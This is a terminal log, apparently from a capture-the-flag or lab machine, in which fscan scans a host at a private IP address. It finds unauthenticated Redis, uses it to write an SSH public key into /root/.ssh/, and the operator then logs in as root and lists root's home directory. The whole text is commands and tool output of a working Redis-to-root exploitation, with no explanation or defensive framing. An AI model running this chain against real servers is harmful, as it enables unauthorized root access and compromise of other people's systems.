1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
| ❯ fscan -h $ip --rf ../.ssh/id_rsa.pub
___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 2.0.0 [*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880 [*] 开始信息扫描... [*] 最终有效主机数量: 1 [*] 共解析 218 个有效端口 [+] 端口开放 192.168.60.208:80 [+] 端口开放 192.168.60.208:22 [+] 端口开放 192.168.60.208:6379 [+] 端口开放 192.168.60.208:8080 [+] 存活端口数量: 4 [*] 开始漏洞扫描... [+] Redis扫描模块开始... [*] 网站标题 http://192.168.60.208 状态码:200 长度:10705 标题:Apache2 Test Debian Default Page: It works [*] 网站标题 http://192.168.60.208:8080 状态码:200 长度:10705 标题:Apache2 Test Debian Default Page: It works [+] Redis 192.168.60.208:6379 发现未授权访问 文件位置:/root/dump.rdb [+] Redis 192.168.60.208:6379 可写入路径 /root/.ssh/ [!] 扫描错误 192.168.60.208:22 - 扫描总时间超时: context deadline exceeded [+] Redis 192.168.60.208:6379 SSH公钥写入成功 [+] Redis 192.168.60.208:6379 可写入路径 /var/spool/cron/ [+] 扫描已完成: 4/4 [*] 扫描结束,耗时: 11.095615855s ❯ ssh root@$ip -i .ssh/id_rsa Warning: Identity file .ssh/id_rsa not accessible: No such file or directory. The authenticity of host '192.168.60.208 (192.168.60.208)' can't be established. ED25519 key fingerprint is SHA256:7e6nZsLIg3VH7MUpoakFpn75ysrvjz0K0YGrMGHcpLY. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.60.208' (ED25519) to the list of known hosts. Linux ready 5.10.0-16-amd64 Last login: Wed Jul 12 18:22:32 2023 root@ready:~# ls -al total 32 drwx------ 4 root root 4096 abr 18 2023 . drwxr-xr-x 18 root root 4096 jul 19 2022 .. lrwxrwxrwx 1 root root 9 jul 19 2022 .bash_history -> /dev/null -rwx------ 1 root root 3526 jul 19 2022 .bashrc drwx------ 3 root root 4096 jul 19 2022 .local -rwx------ 1 root root 161 jul 9 2019 .profile -rw------- 1 root root 225 abr 18 2023 root.zip -rw-r--r-- 1 root root 66 abr 17 2023 .selected_editor drwx------ 2 root root 4096 feb 26 05:07 .ssh
|